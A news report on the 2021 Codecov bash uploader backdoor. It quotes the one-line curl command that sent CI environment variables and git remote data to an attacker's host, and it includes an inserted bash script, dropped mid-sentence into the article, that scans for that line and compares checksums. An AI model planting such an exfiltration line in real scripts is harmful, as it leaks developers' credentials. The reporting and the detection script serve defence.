A publicly available software development tool contained malicious code that stole the authentication credentials applications need to access sensitive resources. It is the latest manifestation of a supply chain attack with the potential to disrupt the networks of countless organizations.
The Codecov bash uploader was backdoored from the end of January to the beginning of April, the tool's developers said on Thursday. The backdoor allowed developers' computers to send private credentials and other sensitive data to a remote site controlled by the attackers. The uploader works with development platforms including GitHub Actions, CircleCI and Bitrise Step, all of which support storing such secret credentials in the development environment.
Heaps of AWS and other cloud credentials
The Codecov bash uploader provides what is known as code coverage for large software development projects. It allows developers to submit coverage reports that, among other things, measure how much of the codebase has been exercised by internal test scripts. Some development projects integrate Codecov and similar third-party services into their platforms, where the services have free access to sensitive credentials that can be used to steal or change the source code.
Code similar to this single line first appeared on January 31:
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" || true
The code sent both the GitHub repository location and the entire process environment to a remote site, whose address has been redacted because Codecov says it is part of an ongoing federal investigation. Environments like these usually store tokens, certificates, and other secrets for software running in Amazon Web Services or GitHub.
Armed with these secrets, there is no shortage of malicious things an attacker could do to development environments that rely on the tool, said HD Moore, a security expert and CEO of the Rumble network discovery platform.
“It really depends on what's in the environment, but from the point where the attackers have access (via the bash uploader), they may have been able to plant backdoors on systems where it runs,” he wrote in a direct message with Ars. “For GitHub/CircleCI, this would have exposed most source code and credentials.”
Moore continued:
The attackers can end up with a bunch of AWS and other cloud credentials in addition to tokens that can give them access to private repositories, which include source code but also everything else that the token has been given permission for. At the far end of the scale, these credentials can be self-perpetuating: the stolen source code itself contains customer credentials, and so on. The same applies to AWS keys and other cloud credentials. If the credentials are permissive, they can enable infrastructure takeover, data access, file access, etc.
In Wednesday's advisory, Codecov said the malicious version of the bash uploader could access:
- Any credentials, tokens, or keys that our customers pass through their CI (continuous integration) runner, which would be accessible when the bash uploader script is executed.
- Any services, datastores, and application code that could be accessed with those credentials, tokens, or keys
- The git remote information (URL of the origin repository) of repositories using the bash uploader to upload coverage to Codecov in CI
“Based on the results of the forensic investigation to date, it appears that periodic unauthorized access to a Google Cloud Storage key began on January 31, 2021, which allowed a malicious third party to modify a version of the bash uploader script to export information subject to continuous integration to a third-party server,” Codecov said. “Codecov secured and corrected the script on April 1, 2021.”
Codecov's advisory says a bug in Codecov's Docker image creation process allowed the hacker to extract the credential needed to modify the bash uploader script.
The exploit was discovered on April 1 by a customer who noticed that the shasum used as a digital fingerprint to verify the integrity of the bash uploader did not match the shasum of the version they had downloaded from Codecov. The tool maker pulled the malicious version and started an investigation.
Codecov urges anyone who used the bash uploader during the affected period to revoke all existing credentials, tokens, or keys in their CI processes and create new ones. Developers can determine what keys and tokens are stored in their CI environment by running the env command in their CI pipeline. Anything listed should be considered compromised.
Additionally, anyone using a locally stored version of the bash uploader should check for the following:
curl -sm 0.5 -d "$(git remote -v)
If this command appears anywhere in the locally stored bash uploader, users should immediately replace the uploader with the latest version from
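The two checks the article describes (comparing the uploader's shasum against a digest you have already vetted, and searching a locally stored copy for the quoted curl line) as an added bash example; this is not Codecov's own code, and the file contents and pinned digest are constructed for the demo:

```shell
#!/usr/bin/env bash
# Added example (not Codecov's code): two defensive checks for a locally
# stored copy of a CI upload script such as the Codecov bash uploader.
#   1. verify_checksum: compare the script's SHA-256 with a pinned digest
#      (the shasum comparison that exposed the tampered uploader).
#   2. scan_uploader: look for the exfiltration line quoted in the advisory.
# File contents below are constructed samples, not real uploader code.

# The literal string Codecov told users to search for.
EXFIL_PATTERN='curl -sm 0.5 -d "$(git remote -v)'

# Print the SHA-256 digest of a file using whichever tool the host has.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_checksum FILE EXPECTED_SHA256 -> 0 if the digest matches, 1 otherwise.
verify_checksum() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# scan_uploader FILE -> 0 if clean, 1 if the exfiltration pattern is present.
# grep -F matches literally, so "$(" and "." are not treated as regex syntax.
scan_uploader() {
    if grep -qF -- "$EXFIL_PATTERN" "$1"; then
        echo "TAMPERED: exfiltration pattern found in $1" >&2
        return 1
    fi
    return 0
}

# Demo: a benign stub, and the same stub with the backdoor line appended.
demo() {
    local clean bad pinned
    clean=$(mktemp); bad=$(mktemp)
    printf '#!/bin/bash\ncurl -X POST --data-binary @coverage.xml "$UPLOAD_URL"\n' > "$clean"
    { cat "$clean"; printf '%s<<<<<< ENV $(env)" || true\n' "$EXFIL_PATTERN"; } > "$bad"
    scan_uploader "$clean" && echo "clean copy: no exfil pattern"
    scan_uploader "$bad" || echo "tampered copy: flagged"
    pinned=$(sha256_of "$clean")   # digest of the copy you vetted by hand
    verify_checksum "$bad" "$pinned" || echo "tampered copy: checksum mismatch"
    rm -f "$clean" "$bad"
}

demo
```

In a real pipeline, pin the digest of the uploader version you reviewed and fail the build when either check fails, rather than fetching and executing the script unverified on every run.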
Codecov says that developers using the self-hosted version of the bash uploader are unlikely to be affected. “To be affected, your CI pipeline would need to fetch the bash uploader from instead of a self-hosted Codecov installation. You can verify where you are fetching the bash uploader from by looking at your CI pipeline configuration,” the company said.
The supply chain remains an appealing target
The compromise of Codecov's software development and distribution system is the latest supply chain attack to come to light. In December, a similar attack hit SolarWinds, an Austin, Texas maker of network management tools used by about 300,000 organizations around the world, including Fortune 500 companies and government agencies.
The hackers who carried out that breach distributed a malicious update that was downloaded by 18,000 customers. About 10 U.S. federal agencies and 100 private companies eventually received follow-on payloads that sent sensitive information to attacker-controlled servers. FireEye, Microsoft, Mimecast, and Malwarebytes were all swept up in the campaign.
More recently, hackers compromised the software supply chain of NoxPlayer, a software package that emulates the Android operating system on PCs and Macs, essentially so that users can play mobile games on those platforms, in order to install malware on people's computers. The backdoored version of NoxPlayer was available for five months, researchers from ESET said.
The appeal of supply chain attacks to hackers is their breadth and effectiveness. By compromising a single player that sits upstream in software distribution, hackers can infect any person or organization that uses the tainted product. Another feature hackers see as an advantage: there is often little or nothing targets can do to detect malicious software distributed this way, because the digital signatures check out as legitimate.
In the case of the backdoored bash uploader, however, it would have been easy for Codecov or any of its customers to detect the malware by doing nothing more than checking the shasum. That a malicious version escaped notice for three months indicates that no one bothered to perform this simple check.
People who used the bash uploader between January 31 and April 1 should carefully check their development environments for signs of compromise by following the steps outlined in Wednesday's advisory.